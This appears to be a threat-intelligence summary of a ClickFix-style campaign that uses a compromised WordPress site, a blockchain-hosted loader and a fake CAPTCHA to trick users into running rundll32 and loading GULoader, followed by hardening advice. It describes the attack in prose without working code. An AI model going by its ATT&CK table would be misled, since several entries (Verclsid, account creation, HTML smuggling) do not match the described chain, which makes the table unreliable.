EXECUTIVE SUMMARY
A loosely organized threat actor has compromised a European small‐business WordPress site and turned it into a delivery platform for a multi‐stage malware campaign. The operation combines a blockchain‐hosted payload, a fake CAPTCHA overlay, and a Windows LOLBin loader to achieve remote code execution. Targets are Windows desktop users who browse the site, with most victims located in corporate environments across Europe and North America. The attacker's primary objective is to establish a foothold that can be used for further payload delivery, data exfiltration, or ransom‐related activity.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
A loosely organized threat actor has compromised a European small‐business WordPress site and turned it into a delivery platform for a multi‐stage malware campaign. The operation combines a blockchain‐hosted payload, a fake CAPTCHA overlay, and a Windows LOLBin loader to achieve remote code execution. Targets are Windows desktop users who browse the site, with most victims located in corporate environments across Europe and North America. The attacker's primary objective is to establish a foothold that can be used for further payload delivery, data exfiltration, or ransom‐related activity.[emaillocker id="1283"]
The infection chain begins when the compromised WordPress injects obfuscated JavaScript into every page load. The script contacts a BNB Smart Chain testnet node, retrieves a small loader, and then paints a fake reCAPTCHA prompt that copies a rundll32 command to the clipboard. A user who follows the on‐screen instructions triggers rundll32.exe with a UNC path, causing the system to stream a malicious DLL directly from a remote share into memory. The loaded module, identified as GULoader, establishes persistence, reaches out to a command‐and‐control server, and can download additional components for lateral movement and data theft.
The campaign is significant because it bypasses traditional reputation filters by using a legitimate website and a public blockchain, leaving no on‐disk artifact for signature scanners. Execution relies on a user‐initiated rundll32 call, which appears benign to most whitelisting solutions, making detection difficult until behavioral alerts fire. Organizations should harden web browsing by blocking outbound SMB and WebDAV traffic, disabling the WebClient service on workstations that do not require it, and monitoring for abnormal rundll32 arguments. Regular patching of content management systems, continuous integrity checks of server plugins, and user awareness training about unexpected CAPTCHA prompts further reduce risk.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1189 | Drive-by Compromise | — |
| Defense Evasion | T1218.012 | System Binary Proxy Execution | Verclsid |
| Execution | T1204 | User Execution | — |
| Persistence | T1136.001 | Create Account | Local Account |
| Defense Evasion | T1027.006 | Obfuscated Files or Information | HTML Smuggling |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
reports contain further technical details:
https://cybersecuritynews.com/clickfix-campaign-uses-etherhiding-and-guloader/
https://blog.sicuranext.com/one-paste-to-rule-them-all-inside-a-clickfix-etherhiding-guloader-intrusion/